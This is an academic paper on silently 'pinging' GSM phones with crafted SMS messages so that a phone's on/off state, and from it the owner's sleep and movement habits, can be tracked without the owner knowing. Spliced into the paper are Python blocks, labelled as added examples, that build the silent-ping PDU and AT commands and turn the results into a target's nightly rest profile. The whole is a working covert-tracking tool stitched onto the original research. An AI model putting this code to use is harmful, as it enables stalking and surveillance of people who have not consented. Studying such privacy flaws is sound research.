18-comsware-2008

A Plain Type of Mobile Attack: Compromise of User's Privacy through a Simple Implementation Method

Iosif Androulidakis
Network Operations Center, University of Ioannina
University Campus, 451-10 Dourouti, GREECE
sandro@noc.uoi.gr

Chris Basios
Computer Networks Laboratory, National Technical Univ. of Athens
Heroon Politechneiou 9, 151-22 Zografou, GREECE
cbas@telecom.ntua.gr
Abstract - An easy way to determine the state of a cell phone (switched on or off) without the owner's knowledge is presented in this paper. The described method, combined with a form of patterning of the mobile user's behavior (evaluating the phone's state at chosen times), can lead to a privacy compromise that reveals the user's whereabouts. The technical part of the paper is based on the Short Message Service and its Receipt Report facility, manipulated in such a way that no information is revealed to the targeted user. In addition, the method can provide known plaintexts for an attack on A5.
Keywords - GSM, SMS, Ping, Monitoring, Mobile Security, Privacy, DoS
I. INTRODUCTION
Nowadays, cellular networks have become a critical component of the economic and social infrastructure of our lives, and almost everybody in developed countries owns a personal cell phone. In addition to voice and other mobile services, telecom providers deliver, on a daily basis, a vast number of text messages to the majority of subscribers, making this particular service (SMS) so popular, especially among certain user groups (e.g. youth), that it can, in a way, determine the user's social profile [1],[2]. Despite this popularity, it is also known that certain places (e.g. elevators, subways, tunnels, mountains) are inherently out of network reach, while others (e.g. densely populated areas) may present a permanent bottleneck leading to delayed delivery of short messages.
Based on these observations, we demonstrate a method to monitor the state of a mobile phone without the knowledge of the affected user, which can lead to a compromise of his privacy and a partial disclosure of his whereabouts. The proposed technique uses the Short Message Service (SMS) and the associated Receipt Report in order to determine the state of the phone, and can be compared to the operating system command 'ping', which in its simplest form tells the user whether a computer on the network is 'alive' or not. The GSM counterpart of the ping command is achieved using a specially crafted SMS (in PDU form), making it possible to monitor the state of the phone and reveal the user's basic social habits, without affecting its mobile operation and, of course, without any visual or sound alert towards the user.
In order to investigate users' concerns regarding the aforementioned and additional issues, we conducted a survey among 442 students of the University of Ioannina, Greece. The results of the survey that are relevant to the presented work are shown later in the paper.
The rest of this paper is organized as follows: in section 2 we present an overview of the GSM and SMS system architecture; section 3 comprises the implementation issues of our technique, while in section 4 the results of our study are shown. Finally, in section 5 we conclude with some general remarks and our future work intentions.
II. GSM AND SMS ARCHITECTURE OVERVIEW
A. GSM Architecture
The GSM technical specifications [3] define the different entities that form the GSM network, their functions and their interface requirements. The GSM network can be divided into four main parts:
The Mobile Station (MS).
The Base Station Subsystem (BSS).
The Network and Switching Subsystem (NSS).
The Operation and Support Subsystem (OSS).
The architecture and the main components of the GSM network are presented in Fig. 1.
Authorized licensed use limited to: University of Ioannina. Downloaded on March 14, 2009 at 06:03 from IEEE Xplore. Restrictions apply.
Figure 1. Architecture of the GSM network
B. SMS Architecture
The Short Message Service [4] is a mechanism for delivering short messages over mobile networks. It is a store-and-forward way of transmitting messages to and from mobiles: the message from the sending mobile is stored in a central Short Message Service Center (SMSC), which then forwards it to the destination mobile. This means that if the recipient is not available, the short message is stored and can be delivered later. Each short message can be no longer than 160 characters, and these characters can be text (alphanumeric) or binary (non-text) short messages.
An interesting feature of SMS is return receipts: the sender, if he wishes, can get a small message notifying him whether the short message was delivered to the intended recipient. Since SMS uses the signaling channel as opposed to dedicated traffic channels, short messages can be sent and received simultaneously with voice, data or fax service over a GSM network. In addition, SMS supports national and international roaming, which means that a short message can be sent to any other GSM mobile user around the world. With PCS networks based on all three technologies (GSM, CDMA and TDMA) supporting SMS, SMS is more or less a universal mobile data service.
The next figure shows a typical SMS flow diagram.
Figure 2. SMS routing flow diagram
It is also worth mentioning that SMS by default is sent in clear text, in a predictable format. When an SMS is sent from an MS to a Service Center it is in 'SMS-SUBMIT' format. The Service Center then sends a message to the destination MS in the format of an 'SMS-DELIVER'. The structures of 'SMS-SUBMIT' and 'SMS-DELIVER' messages are different, but both adhere to a public standard, and the SMS-DELIVER corresponding to a given SMS-SUBMIT is largely predictable (the time stamp on an SMS-DELIVER is roughly, but not exactly, predictable). In addition, the format of the report a sender can ask for is also known and contains a time stamp. Pinging a user's mobile phone without any type of notification (using our technique), coupled with the aforementioned predictability, can help in mounting an attack on A5. This technical issue has already been noted by Steve Lord: "It is possible to send certain SMS messages that will not alert the end-subscriber, but will still return a delivery report – providing known plain texts for an attack on A5" [7].
C. PDU Mode
An SMS message, as specified by ETSI ([4]), can be up to 160 characters long, where each character is 7 bits according to the GSM 7-bit default alphabet. 8-bit messages (max 140 octets) are usually not viewable by phones as text messages; instead they are used for data, e.g. smart messaging (images and ringing tones) and OTA provisioning of WAP settings. 16-bit messages (max 70 characters) are used for Unicode (UCS2) text messages, viewable by most phones.
There are two ways of sending and receiving SMS messages:
by text mode
by PDU (Protocol Data Unit) mode
Text mode (unavailable on some phones) is just a textual encoding of the bit stream represented by PDU mode. PDU mode (the mode we used in our work) can carry binary information in 7-bit or 8-bit format.
1) Sending a message in PDU mode:
The following example shows how to send the message "hellohello" in PDU mode [5] (which was selected as our preferred mode of sending messages) from a cell phone adhering to the AT command set:
AT+CMGF=0      // Set PDU mode
AT+CSMS=0      // Check whether the modem supports SMS commands
AT+CMGS=23     // Send message, 23 octets (excluding the initial 00)
>0011000B916407281553F80000AA0AE8329BFD4697D9EC37
Note that there are 23 octets in this message (46 hex 'characters'), as the first octet ("00") does not count: it is only the length of the SMSC information supplied (0), meaning that the service center address stored in the phone is used. Table I shows all the octets of the PDU string.
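As an added example that is not part of the paper, the following Python decoder walks the octet string above field by field, in the order Table I lists them, unpacks the 7-bit user data back to "hellohello", and interprets TP-DCS according to the coding groups the paper relies on later (Tables II and III). Only the GSM 7-bit default alphabet and UCS2 are decoded to text; septets whose GSM character differs from ASCII are rendered as '?' (an assumption made to keep the block short).

```python
"""Decode a GSM 03.40 SMS-SUBMIT PDU into the octet fields listed in Table I.

Added example, not the paper's own program. The input is the hex string that
follows the AT+CMGS prompt (SMSC-length octet first).
"""

# Septet values whose GSM 7-bit default-alphabet character equals the ASCII one
# (letters, digits, space and most punctuation; '@', '$', '_' and brackets differ).
ASCII_SAME = (set(range(0x41, 0x5B)) | set(range(0x61, 0x7B))
              | set(range(0x25, 0x40)) | {0x0A, 0x0D, 0x20, 0x21, 0x22, 0x23})


def swap_digits(octets: bytes) -> str:
    """Reversed-nibble BCD: octet 0x64 carries the digits '4' then '6'."""
    return "".join(f"{o & 0x0F:X}{o >> 4:X}" for o in octets)


def unpack_7bit(data: bytes, count: int) -> str:
    """Undo GSM 7-bit packing: septet i occupies bits 7*i .. 7*i+6, LSB first."""
    bits = int.from_bytes(data, "little")
    septets = [(bits >> (7 * i)) & 0x7F for i in range(count)]
    return "".join(chr(s) if s in ASCII_SAME else "?" for s in septets)


def relative_validity(vp: int) -> str:
    """TP-Validity-Period in relative format (TP-VPF = 10), GSM 03.40 9.2.3.12.1."""
    if vp <= 143:
        return f"{(vp + 1) * 5} minutes"
    if vp <= 167:
        return f"{12 * 60 + (vp - 143) * 30} minutes"
    if vp <= 196:
        return f"{vp - 166} days"
    return f"{vp - 192} weeks"


def alphabet_of(dcs: int) -> str:
    """Alphabet implied by TP-DCS (coding groups of Table II)."""
    group = dcs >> 4
    if (group & 0xC) == 0:                    # 00xx: general data coding
        return ("7bit", "8bit", "ucs2", "reserved")[(dcs >> 2) & 0x3]
    if group in (0xC, 0xD):                   # MWI discard / MWI store
        return "7bit"
    if group == 0xE:                          # MWI store, UCS2 text
        return "ucs2"
    if group == 0xF:                          # data coding / message class
        return "8bit" if dcs & 0x04 else "7bit"
    return "reserved"


def describe_dcs(dcs: int) -> str:
    """Human-readable TP-DCS, including the MWI bits of Table III."""
    group = dcs >> 4
    if group in (0xC, 0xD, 0xE):
        action = {0xC: "discard message", 0xD: "store message",
                  0xE: "store message (UCS2)"}[group]
        state = "active" if dcs & 0x08 else "inactive"
        kind = ("voicemail", "fax", "e-mail", "other")[dcs & 0x03]
        return f"MWI {action}, indication {state}, {kind} waiting"
    if group == 0xF:
        return f"data coding/message class {dcs & 0x03}, {alphabet_of(dcs)}"
    if (group & 0xC) == 0:
        return f"general data coding, {alphabet_of(dcs)}"
    return "reserved coding group"


def parse_submit(pdu_hex: str) -> dict:
    """Walk the octets of an SMS-SUBMIT in the order of Table I."""
    b = bytes.fromhex(pdu_hex)
    smsc_len = b[0]
    pos = 1 + smsc_len                        # skip SMSC information, if any
    first = b[pos]
    pos += 1
    if first & 0x03 != 0x01:
        raise ValueError("TP-MTI is not SMS-SUBMIT")
    f = {"smsc_len": smsc_len, "tpdu_octets": len(b) - 1 - smsc_len,
         "first_octet": first, "tp_srr": bool(first & 0x20), "tp_mr": b[pos]}
    pos += 1
    addr_len, toa = b[pos], b[pos + 1]        # digit count, then Type-of-Address
    pos += 2
    n = (addr_len + 1) // 2                   # odd digit counts are padded with F
    f["tp_da"] = ("+" if toa == 0x91 else "") + swap_digits(b[pos:pos + n])[:addr_len]
    pos += n
    f["tp_pid"], f["tp_dcs"] = b[pos], b[pos + 1]
    pos += 2
    vpf = (first >> 3) & 0x03                 # TP-VPF: 00 absent, 10 relative, 01/11 7 octets
    if vpf == 2:
        f["tp_vp"] = relative_validity(b[pos])
        pos += 1
    elif vpf in (1, 3):
        f["tp_vp"] = b[pos:pos + 7].hex().upper()
        pos += 7
    f["tp_udl"] = b[pos]
    pos += 1
    ud = b[pos:]
    f["tp_ud_hex"] = ud.hex().upper()
    f["dcs_meaning"] = describe_dcs(f["tp_dcs"])
    alphabet = alphabet_of(f["tp_dcs"])
    if alphabet == "7bit":
        f["text"] = unpack_7bit(ud, f["tp_udl"])          # UDL counts septets
    elif alphabet == "ucs2":
        f["text"] = ud[:f["tp_udl"]].decode("utf-16-be")  # UDL counts octets
    else:
        f["text"] = None
    return f


if __name__ == "__main__":
    for k, v in parse_submit("0011000B916407281553F80000AA0AE8329BFD4697D9EC37").items():
        print(f"{k:12} {v}")
```

The same parser applied to a PDU whose TP-DCS sits in the '1100' coding group reports the indication type and sense directly, which is a quick way to check what a captured "silent" message actually asks the handset to do.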
TABLE I. DESCRIPTION OF OCTETS IN A PDU MODE SMS
Octets               Description
00                   Length of SMSC information (0: the service center address stored in the phone is used)
11                   1st octet of the SMS-SUBMIT message
00                   TP-Message-Reference
0B                   Address-Length (11 digits)
91                   Type-of-Address (international format)
6407281553F8         The phone number in semi-octets (46708251358)
00                   TP-PID (Protocol Identifier)
00                   TP-DCS (Data Coding Scheme)
AA                   TP-Validity-Period ('AA' means 4 days)
0A                   TP-User-Data-Length (length of message: 10 septets)
E8329BFD4697D9EC37   TP-User-Data (these octets represent the message "hellohello")
2) Data Coding Scheme:
The TP-DCS field, as defined in [4], indicates the data coding scheme of the TP-UD field and may also indicate a message class. The octet is interpreted according to a coding group indicated by bits '7…4'. Table II presents the possible coding groups of the octet in an abstract way (further details would be out of the scope of this paper).
TABLE II. DESCRIPTION OF '7…4' CODING GROUP OF BITS
Coding Group Bits '7…4'   Description
00xx                      General Data Coding indication (text compression, alphabet being used etc.)
0100…1011                 Reserved Coding Groups
1100                      Message Waiting Indication Group: Discard Message
1101                      Message Waiting Indication Group: Store Message
1110                      Message Waiting Indication Group: Store Message (the text included in the user data is coded in the uncompressed UCS2 alphabet)
1111                      Data coding/message class
We are particularly interested in the '1100' coding group, as it is the one we used in order to prevent the user from being notified of any SMS reception originating from our implementation. This group allows an indication to be provided to the user about the status of types of message waiting on systems connected to the GSM PLMN, while instructing the phone to discard the message itself.
Table III presents in further detail bits '3…0' of the particular coding group.
TABLE III. DESCRIPTION OF BITS '3…0' OF THE MESSAGE WAITING INDICATION CODING GROUPS (THE '1100', '1101' AND '1110' GROUPS SHARE THIS LAYOUT)
Bits    State   Description
3       0       Set Indication Inactive
3       1       Set Indication Active
2       0       Bit 2 is reserved and set to 0
1…0     00      Voicemail Message Waiting
1…0     01      Fax Message Waiting
1…0     10      Electronic Mail Message Waiting
1…0     11      Other Message Waiting
III. METHODOLOGY
As previously noted, we have to send to the other party a specially crafted short message. The easiest way to do that is by connecting any cell phone to a personal computer or laptop and using the cell phone as a terminal in order to access the network and send the message. For the sake of simplicity, we used a standard cell phone with a cheap serial cable that connects the phone to the serial port of the PC (Fig. 3).
Figure 3. Implementation layout
The simplest way of communicating with the cell phone through the serial cable is by using 'HyperTerminal', a tool for Microsoft Windows that can be used to connect to other computers using a variety of protocols. In our case we used it to access serial port COM1, the port of the computer to which the mobile phone was attached. Obviously, COM2 or any other mapped serial port could be used instead.
This connection gives access to the cell phone's modem, so the user can issue AT commands [6]. Hayes developed the AT command set to support the configuration of a modem for each connection; it allows the modem to be told which functions and modes to use when initializing a connection. Apart from the standard AT command set, mobile phone modems implement a superset of it, providing many more options. All the aforementioned commands are described in [7].
In order to automate the process and gather readings, we wrote a small program in Basic that takes care of the communication and the logging of the network responses. The output of the program is shown in the appendix.
Our work was mainly based on the extended AT command that gives access to SMS in order to send messages, namely AT+CMGS. Some device-specific AT command sets, provided by the manufacturers and usable only on the relevant phones, were also available, but such functionality was not needed.
Having described both the software and the hardware, we can proceed to the implementation itself. As recalled from the previous section, we have to construct the appropriate PDU. The specific field that makes our approach possible is the 'TP-Data-Coding-Scheme' field (see section 2.3.2). We used the 'Message Waiting Indication Group: Discard Message' and, in particular, the bit that switches the indicator off along with the coding that does not store the message on the mobile phone.
To sum up, we send a special short message that instructs the cell phone to switch off the 'Fax waiting' indicator (so that the user is not notified) and to discard the message itself. A user has almost never used the particular service (so the indicator would be switched off anyway); nevertheless, we explicitly switch the indicator off so as to prevent any notification.
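The following Python encoder is an added example, not the paper's Basic program. It first reproduces the "hellohello" PDU of section II.C.1 as a check of the encoder, then builds the message just described: TP-DCS in the Message Waiting Indication 'Discard Message' group (bits 7…4 = 1100), indication inactive (bit 3 = 0), type Fax (bits 1…0 = 01), i.e. 0xC1. The Receipt Report the technique depends on is requested by the TP-Status-Report-Request bit (bit 5 of the first octet), which the paper does not spell out. Two assumptions are made here: the ping carries no user data, and the destination 46708251358 is simply the example number of Table I.

```python
"""Build the SMS-SUBMIT PDU of a silent SMS 'ping' and the AT commands that send it.

Added example, not the paper's own program. Octet layout follows Table I.
"""

# ASCII characters whose GSM 7-bit default-alphabet code equals their ASCII code
ASCII_SAME = (set(range(0x41, 0x5B)) | set(range(0x61, 0x7B))
              | set(range(0x25, 0x40)) | {0x0A, 0x0D, 0x20, 0x21, 0x22, 0x23})


def to_septets(text: str) -> list[int]:
    """Map text to GSM 7-bit septets; refuse characters outside the ASCII-identical subset."""
    bad = [c for c in text if ord(c) not in ASCII_SAME]
    if bad:
        raise ValueError(f"characters not in the ASCII-identical GSM subset: {bad!r}")
    return [ord(c) for c in text]


def pack_7bit(septets: list[int]) -> bytes:
    """GSM 7-bit packing: septet i lands at bits 7*i .. 7*i+6, least significant first."""
    bits, nbits, out = 0, 0, bytearray()
    for s in septets:
        bits |= (s & 0x7F) << nbits
        nbits += 7
        while nbits >= 8:
            out.append(bits & 0xFF)
            bits >>= 8
            nbits -= 8
    if nbits:
        out.append(bits & 0xFF)
    return bytes(out)


def encode_address(number: str) -> bytes:
    """Address-Length (number of digits), Type-of-Address 0x91, reversed-nibble BCD."""
    digits = number.lstrip("+")
    if not digits.isdigit():
        raise ValueError("destination must be digits")
    padded = digits + "F" if len(digits) % 2 else digits   # odd length: pad with F
    swapped = "".join(padded[i + 1] + padded[i] for i in range(0, len(padded), 2))
    return bytes([len(digits), 0x91]) + bytes.fromhex(swapped)


def mwi_dcs(kind: str, active: bool = False, store: bool = False) -> int:
    """TP-DCS for the Message Waiting Indication groups of Tables II and III."""
    types = {"voicemail": 0, "fax": 1, "email": 2, "other": 3}
    return (0xD0 if store else 0xC0) | (0x08 if active else 0x00) | types[kind]


def build_submit(dest: str, text: str = "", dcs: int = 0x00,
                 status_report: bool = False, validity: int = 0xAA) -> bytes:
    """TPDU of an SMS-SUBMIT with relative validity period (TP-VPF = 10)."""
    first = 0x01 | 0x10                        # TP-MTI = SUBMIT, TP-VPF = relative
    if status_report:
        first |= 0x20                          # TP-SRR: ask the SMSC for a status report
    septets = to_septets(text)
    return (bytes([first, 0x00])               # first octet, TP-MR
            + encode_address(dest)
            + bytes([0x00, dcs, validity, len(septets)])   # TP-PID, TP-DCS, TP-VP, TP-UDL
            + pack_7bit(septets))


def at_commands(tpdu: bytes) -> list[str]:
    """AT dialogue as in section II.C.1; the CMGS length excludes the leading SMSC octet."""
    return ["AT+CMGF=0", "AT+CSMS=0", f"AT+CMGS={len(tpdu)}",
            "00" + tpdu.hex().upper() + "\x1a"]   # Ctrl-Z terminates the PDU


def ping_commands(dest: str) -> list[str]:
    """The silent ping of section III: fax indicator off, message discarded, report requested."""
    return at_commands(build_submit(dest, dcs=mwi_dcs("fax"), status_report=True))


if __name__ == "__main__":
    print("\n".join(at_commands(build_submit("+46708251358", "hellohello"))))
    print("\n".join(ping_commands("+46708251358")))
```

The ping PDU comes out 14 octets long (AT+CMGS=14). To actually read the report on the originating phone, status-report indications (+CDS) have to be enabled with AT+CNMI, as described in [7]; whether the report says "delivered" or is still pending is what the technique turns into the 'On'/'Off' sample.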
There are also alternative services (including the 'Voice mail' indicator, the 'E-mail' indicator etc.) that could be used in a similar way, but they are not quite suitable for our purpose, because most of the time their use is accompanied by visual or sound alerts informing the user about the arriving message.
To demonstrate our tests we used a 'Siemens S55' cell phone as the originating mobile and quite a few target cell phones. It must be noted that we did not find a single cell phone that did not comply with our testing: none of them provided any visual or sound indication of the 'attack' taking place. The originating network was that of Vodafone GR, and the targeted cell phones were using Vodafone GR, Cosmote and WIND GR (the 3 main mobile service providers in Greece).
It is worth mentioning that ordinary messages remain in the SMSC buffer when the target device's message memory is full. This occurs, as noted in the GSM standards, when the mobile phone returns a Mobile-Station-Memory-Capacity-Exceeded flag, which is recorded in the HLR. However, the type of message we are using does not occupy any memory, as it is merely an indicator, so we did not face any difficulties with this issue when implementing our technique.
A. User Profile Patterning Issue
It has been remarked by many experts that the expanded or enhanced social networks afforded by mobile phones have created a new sense of identity for various groups of people, e.g. teenagers. At the same time, the highly personalized nature of the mobile phone has meant that its form and use have become important aspects of the individuality of a phone user.
Thus, social identity [8] and profile patterning tend to become fundamental for the development of the future mobile information society; the right balance between the release of a user's identity and the protection of his/her privacy needs to be struck early in the development of commercial services.
In our attempt to reveal some habitual characteristics of the user and to configure parts of his/her generic profile, we plot a long sequence of the target phone's state indications, each one being the acknowledgment (or lack of it) to one of our SMS 'hits'. In the next figure a schematic example is given (all the relevant data can be provided from the related databases). The blue dots represent the 'On' indications of the target mobile, while the red dots represent the 'Off' indications. One can also notice the exact times of the SMS receptions.
Figure 4. Representative On/Off indications concerning the state of the mobile phone (1 min spacing)
In the next figure a more cumulative pattern is depicted (all the relevant data can be provided from the related databases), focusing on the user's night rest and morning awakening hours. By sending a message every 30 min, we obtain a representative diagram of a weekly user profile.
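The step from a dot plot to "when does this person sleep" is the privacy-relevant one, so here is an added example (not the paper's analysis code, and run on a constructed series rather than measured data) that turns 30-minute ping results into a nightly switch-off window. Two details matter in practice and are handled explicitly: a single missed ping in a tunnel or elevator is not a rest period, so only Off runs of at least min_hours count, and a rest that starts after midnight is filed under the night it belongs to rather than the next calendar day. The spacing, the 3-hour threshold and the 12:00 boundary are assumptions of this example.

```python
"""Turn a series of silent-ping results into a nightly switch-off profile.

Added example, not the paper's analysis code. Each sample is the outcome of one
ping: True when a delivery report came back within the interval (the 'On' dots
of Figure 4), False when none did ('Off').
"""
from datetime import datetime, timedelta

SPACING = timedelta(minutes=30)   # assumed ping interval, as in Figure 5


def off_runs(samples, spacing=SPACING):
    """Maximal runs of Off samples as (off_at, on_at); on_at is the first On afterwards."""
    runs, start = [], None
    for ts, on in samples:
        if not on and start is None:
            start = ts
        elif on and start is not None:
            runs.append((start, ts))
            start = None
    if start is not None:                      # series ended while still Off
        runs.append((start, samples[-1][0] + spacing))
    return runs


def night_rest(samples, spacing=SPACING, min_hours=3.0):
    """Longest qualifying Off run per night, keyed by the ISO date the night began."""
    rests = {}
    for off_at, on_at in off_runs(samples, spacing):
        hours = (on_at - off_at).total_seconds() / 3600
        if hours < min_hours:
            continue                           # coverage gap, not a rest period
        night = off_at.date()
        if off_at.hour < 12:                   # switched off after midnight: previous night
            night -= timedelta(days=1)
        key = night.isoformat()
        if key not in rests or hours > rests[key]["hours"]:
            rests[key] = {"off": off_at.strftime("%Y-%m-%d %H:%M"),
                          "on": on_at.strftime("%Y-%m-%d %H:%M"),
                          "hours": hours}
    return rests


def make_samples(start, hours, off_windows, spacing=SPACING):
    """Constructed series: On everywhere except inside the given [off, on) windows."""
    samples, t, end = [], start, start + timedelta(hours=hours)
    while t < end:
        samples.append((t, not any(a <= t < b for a, b in off_windows)))
        t += spacing
    return samples


def demo():
    """Three days of constructed pings for one target (not measured data)."""
    d = lambda *a: datetime(2008, 1, *a)
    samples = make_samples(d(7, 12, 0), 72, [
        (d(7, 23, 30), d(8, 7, 0)),            # night rest, switched off before midnight
        (d(8, 14, 0), d(8, 14, 30)),           # one missed ping: tunnel or elevator
        (d(9, 0, 30), d(9, 7, 30)),            # went to bed after midnight
    ])
    return night_rest(samples)


if __name__ == "__main__":
    for night, r in sorted(demo().items()):
        print(night, r)
```

On the constructed series the first night is reported as 23:30 to 07:00 and the second, although it began at 00:30 on January 9, is filed under January 8; the 30-minute gap in the afternoon is dropped. With real pings the only input needed is the timestamp of each status report, which is exactly why the technique needs no cooperation from the target.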
Figure 5. Weekly patterning of user's profile (30 min spacing)
IV. RESULTS
The results are divided in 2 categories, concerning both the compromise of privacy and denial of service issues, and we conclude this section with a cost analysis according to our implementation criteria.
The results are very interesting as they provide a means of explaining a user's everyday or weekly habits. For example, figure 5 clearly shows that this particular user switches off his/her mobile for the night rest. Although he/she has a quite stable time for doing so before every working day (Monday-Friday), this changes on Friday and, especially, Saturday. One could claim that there is nothing new in this kind of information, but we believe that the technique can give additional and useful results when used for certain time periods and groups of people.
By using this method one can retrieve valuable information about the social profile of a certain user. For example, one can learn someone's (everyday) habits, i.e. whether he/she switches off the mobile for resting (at noon and/or at night) and, if so, how long he/she usually rests.
Furthermore, all this information can be fed into a statistical analysis of a certain group under examination (e.g. utilization of mobile phones among young students). Additionally, supervisors, educators or other professionals could use this kind of pattern to analyze or examine the work efficiency/concentration of an individual.
In order to assess the effect of such an 'intrusion' on mobile users, we evaluated the concern level of 442 mobile users regarding various security issues, including 'a third party's awareness of the user's mobile mode (on/off)'. The survey was conducted using an in-person delivery technique, and all the respondents were students of the University of Ioannina, Greece. This group was targeted because we wanted the participants to form a representative set within a certain age range (18-24), which corresponds to a major percentage of active mobile users.
The next figure depicts the results of all the responses to the question: "How concerned are you about the possibility that someone else is persistently aware of your mobile's mode (switched on/off)?".
Figure 6. Level of concern regarding the possibility that someone else is aware of the user's mobile mode (on/off)
The results shown in figure 6 are really interesting: almost 1 out of 3 respondents are extremely concerned about the possibility that a third party knows when they have switched their mobile on/off, while another 15% are very concerned about the same issue.
V. CONCLUSIONS
According to our study, it is possible to monitor the whereabouts of a cell phone user based on the 'behavior' of his phone. It is also worth mentioning that this simple implementation method can provide known plaintexts for an attack on A5. The technique under evaluation is fairly easy and needs neither special equipment nor the intervention of an 'insider'. By patterning the everyday use of a phone (making use of the described technique), one can easily determine essential facts about the life of the owner (i.e. wake-up and sleep times, being in different places than usual at certain times of the day, etc.) and thus compromise his privacy.
REFERENCES
[1] Susanna Hedbring, 'Mobile Messaging Usability: Social and Pragmatic Aspects', Technical Report, April 2002
[2] J. V. D. Bulck, 'Text messaging as a cause of sleep interruption in adolescents, evidence from a cross-sectional study', Journal of Sleep Research, 12(3), pp. 263, September 2003
[3] Digital cellular telecommunications system (Phase 2+); General description of a GSM Public Land Mobile Network (PLMN) (GSM 01.02 version 6.0.1 Release 1997), ETSI TS 101 622 V6.0.1 (2001-02)
[4] Digital cellular telecommunications system (Phase 2+); Technical realization of the Short Message Service (SMS) Point-to-Point (PP) (3GPP TS 03.40 version 7.5.0 Release 1998), ETSI TS 100 901 V7.5.0 (2001-12)
[5] http://www.dreamfabric.com/sms/
[6] G. Held, 'The Complete Modem Reference', John Wiley & Sons, Inc., 1991
[7] 3GPP TS 27.007, AT command set for 3G User Equipment, Release 27007-680, 4 April 2005
[8] Anna Truch and Michael Hulme, 'Exploring the implications for social identity of the new sociology of the mobile phone', in Proceedings of 'The Global and Local in Mobile Communication: Places, Images, People, and Connections', Budapest, 10-11 June 2004